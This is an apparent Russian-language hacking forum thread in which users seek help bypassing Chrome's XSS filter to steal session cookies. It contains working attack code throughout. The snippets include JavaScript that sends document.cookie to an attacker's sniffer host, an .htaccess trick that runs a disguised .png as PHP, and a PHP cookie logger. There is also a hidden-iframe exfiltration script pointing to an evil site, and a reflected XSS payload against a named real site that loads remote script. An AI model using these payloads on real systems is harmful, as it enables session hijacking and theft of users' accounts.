Обход пассивка xss Chrome Видел одну тему: HTML: Обход Chrome и так вместо прямой ссылки на снифер http://s.gif делаем в картинке ядовитый код например img = new Image(); img.src = "http://s.gif?"+document.cookie; это мы скрываем расширение .js и открываем на хосте файлом .htaccess нашу картинку и кукисы наши . Делаю так - в .htaccess у меня :AddType application/x-httpd-php .png; Сделал картинку test.png в ней написал код : <script> img = new Image(); img.src = "http://мой_сниффер/image.png?"+document.cookie;</script> - т.е перенаправляю на мой сниффер. Но Chrome не "проглатывает" этот ядовитый код в картинке ,если напрямую указать на сниффер, то приходят ВСЕ кроме cookie... Что я делаю не так ( В Опере все работает через js) срочно нужна помощь ...какой код надо вписать в картинку? и .htaccess?
Может есть вариант справиться с фильтрами Хрома ,описано здесь Bypassing Chrome’s Anti-XSS filter http://blog.securitee.org/?p=37 но этот баг уже пофиксили )))
ещё один.. указывая в .htaccess AddType application/x-httpd-php .png ты всего лишь указываешь серверу обрабатывать файлы .png как php, затем в «картинке» нужно написать свой «ядовитый» код но в качестве принимающей стороны, тоесть на php, а не js. что-то вроде <?php file_put_contents('lold',$_GET['c'],FILE_APPEND); header('content-type: image/png'); file_get_contents('lold.png'); ?> а жертве передать уже свой js со ссылкой на этот файл, где через гет переменную с передать document.cookie. а передать просто файл в котором у тебя написан твой js не прокатит, так как внутри него ты будешь пытаться записать cookie с того же домена на котором он расположен.
Ты наверное имел ввиду ,такой пример: js: <script> document.write("<iframe style=\"position:absolute;visibility:hidden; left:0; top:0;\" src=\"http://<evil_site>/cookie.php?c=" + document.cookie +"\"></iframe>"); </script> cookie.php: <?php file_put_contents('cookies.txt',$_GET['c'],FILE_APPEND); ?> javascript-ы подгружаемые с моего сайта во время выполнения XSS не срабатывают (независимо какой код в них) Например в адресной строке Хрома ввожу : http://www.mail.ru/jsearch/?s="><script src= "http://evallhost/file.js"></script> file.js -подгружается в Хром (видно по обменам пакетами в СommonView) , но не срабатывает . Может из-за защиты , Установленной в последних версиях В опере и в мозиле эта xss-ка "легко" срабатывает . У кого нибудь есть простой пример xss в Хроме...наблюдается тенденция опережения среди браузеров - Chrome
